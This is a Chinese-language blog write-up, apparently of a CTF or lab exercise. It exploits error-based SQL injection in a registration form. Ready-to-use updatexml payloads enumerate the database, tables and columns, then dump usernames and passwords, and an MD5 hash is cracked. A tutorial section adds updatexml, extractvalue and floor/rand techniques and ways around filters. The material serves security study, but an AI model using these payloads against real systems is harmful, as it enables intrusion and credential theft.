1.根据提示,先注册一个账号

2.打开burpsuite拦截,发现是post型,send to repeater 尝试构造闭合

-尝试用单引号构造闭合:

send后的结果如图:

-根据上次构造的结果,再次构造Eira','1','2','3','4','5') #

send后结果如图,注册成功了

3.这里需要用到报错注入

-当前数据库名Eira' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or'

得到结果:

-查表名:' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or'

' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),32,31),0x7e),1) or'

得到结果:

-查列名:' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1) or'

' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31),0x7e),1) or'

' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),63,31),0x7e),1) or'

-查用户名和密码:

' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,',',password)) from users),1,31),0x7e),1) or'

' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,',',password)) from users),32,31),0x7e),1) or'

' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,',',password)) from users),63,31),0x7e),1) or'

' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,',',password)) from users),63,31),0x7e),1) or'

4.以用户admin的密码为例,破解e10adc3949ba59abbe56e057f20f883e

依旧用kali的hash-indentifier工具和MD5在线破解工具

结果如图:

以下是关于报错注入的一些基本知识:

一、报错注入原理
 
利用数据库执行操作时的错误信息,将SQL语句的执行结果 "带出"。当SQL语句存在语法错误或逻辑错误时,数据库会返回包含错误细节的信息,攻击者通过构造特定语句,将查询结果嵌入到错误信息中,从而获取数据。
 
二、构造思路
 
1. 常用函数
-  updatexml() :XML格式验证错误,返回自定义错误信息(如 updatexml(1,concat(0x7e,查询结果),1) )。
-  extractvalue() :XPath语法错误,同理(如 extractvalue(1,concat(0x7e,查询结果)) )
-  floor()/rand() :利用分组时的重复计算触发错误(如 select count(*),concat((查询结果),floor(rand()*2))x from information_schema.tables group by x )。
2. 核心步骤
- 判断是否存在报错点:在参数后添加特殊符号(如 ' ),观察是否返回数据库错误。
- 构造带函数的SQL语句:将查询结果(如表名、列名、数据)通过函数拼接进错误信息。
- 逐层获取数据:通过 substr() 、 ascii() 等函数逐字符提取数据(如 substr((查询语句),1,1) )
 
示例语句(以 updatexml 为例):
 ' and updatexml(1,concat(0x7e,(select database())),1) and '1'='1 
执行后错误信息会显示当前数据库名。
 
三、注意事项
 
- 需数据库开启错误回显(生产环境可能关闭)。
- 部分函数可能被过滤,需尝试替代函数(如 name_const() )
- 需结合实际业务逻辑调整闭合符号(如 " ,  ) 等)。

# sql # 网络安全 # web安全
Logo
火山引擎 ADG 社区

火山引擎开发者社区是火山引擎打造的AI技术生态平台,聚焦Agent与大模型开发,提供豆包系列模型(图像/视频/视觉)、智能分析与会话工具,并配套评测集、动手实验室及行业案例库。社区通过技术沙龙、挑战赛等活动促进开发者成长,新用户可领50万Tokens权益,助力构建智能应用。

更多推荐

Chess用户界面设计:Tailwind CSS样式系统和组件库

GitHub推荐项目精选中的ch/chess是一个类似chess.com的多人在线象棋平台,它采用现代化的前端技术栈构建,尤其在用户界面设计上通过Tailwind CSS样式系统和组件库实现了优雅且功能丰富的交互体验。本文将深入探讨该项目如何利用Tailwind CSS打造一致的设计语言和高效的组件系统,为象棋爱好者提供沉浸式的游戏界面。## 🎨 Tailwind CSS样式系统:构建统一视

avatar 火山引擎 ADG 社区

终极指南:GPT-Engineer如何通过AI自动发现代码问题并提升质量

GPT-Engineer是一款强大的AI驱动代码工具,它能帮助开发者自动检测潜在代码问题、优化代码质量,让编程效率提升3倍以上。无论是新手还是资深开发者,都能通过这款工具轻松发现代码中的隐藏缺陷,减少调试时间,释放更多精力在创造性工作上。## 一键发现代码问题:GPT-Engineer的AI审查魔力GPT-Engineer的核心能力在于其内置的智能代码分析系统。通过集成Python代码格式

avatar 火山引擎 ADG 社区

SatDump中的纠错编码技术:从RS码到Turbo码的完整实现指南

在卫星数据传输过程中,信号往往会受到各种干扰,导致数据错误。SatDump作为一款通用卫星数据处理软件,集成了多种先进的纠错编码技术,确保从卫星接收到的数据能够准确解码。本文将深入解析SatDump中从Reed-Solomon(RS)码到Turbo码的实现细节,帮助读者理解这些技术如何保障卫星通信的可靠性。## 为什么纠错编码对卫星数据至关重要?卫星与地面站之间的通信链路面临着空间辐射、大

avatar 火山引擎 ADG 社区